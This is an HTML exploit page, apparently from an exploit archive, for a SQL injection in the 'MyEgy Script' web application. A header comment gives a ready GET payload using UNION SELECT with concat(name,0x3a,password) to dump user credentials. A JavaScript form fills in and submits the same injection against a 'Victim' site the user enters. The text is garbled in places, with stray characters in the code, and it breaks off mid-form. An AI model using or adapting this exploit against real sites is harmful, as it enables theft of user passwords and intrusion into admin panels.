|
<html>
<!--
Script Name :MyEgy Script
Authur : Karar alShaMi & Sheko (El3akrab Elmodamer)
Email :牋 K4rar@yahoo.com??ahmed_sheko998@yahoo.com
Demo : http://www.7obonlin.com
Exploit : Write the site in (Victim) field then submit the form :)
AdminCp : /?do=login
Note : each color of myegy script have a different columns number so try to change the (Columns number) field
to 6 or 7 or 9 if the exploit failed with 8 :)
Note 2 : We Can Use Get Method To Exploit This Vulnerability
See line 64 $cat = $_REQUEST['c'];
So we Can Exploit it in this way
http://localhost/myegy/?c=[Sql]
[Sql] = -1+union+select+1,2,3,4,concat(name,0x3a,password),6,7,8+from+users--
//-->
<head><title>MyEgy Explo!t</title>
<style type="text/css">
..style1 {
爐ext-align: center;
}
</style>
</head>
<body>
<script language="Javascript">
function doit(si,co){
爁or(var n =1;n<co;n++){
爄f(tmp){
爒ar tmp = tmp+n+",";
?}else{
爒ar爐mp = n+",";
爙
?}
tmp =tmp.replace(5,"concat(name,0x3a,password)");
document.f0.action=si+'/';
document.f0.c.value='-1/**/union/**/select/**/'+tmp+co+'/**/from/**/users--';
document.f0.submit;
}
</script>
<form name="f0" method="post">
<p class="style1">My Egy Explo!t</p>
<p class="style1">By : Karar alShaMi & Sheko</p>
<p class="style1">Victim: <input name="site" type="text" style="width: 253px" value="
|
推荐
评论(0条)
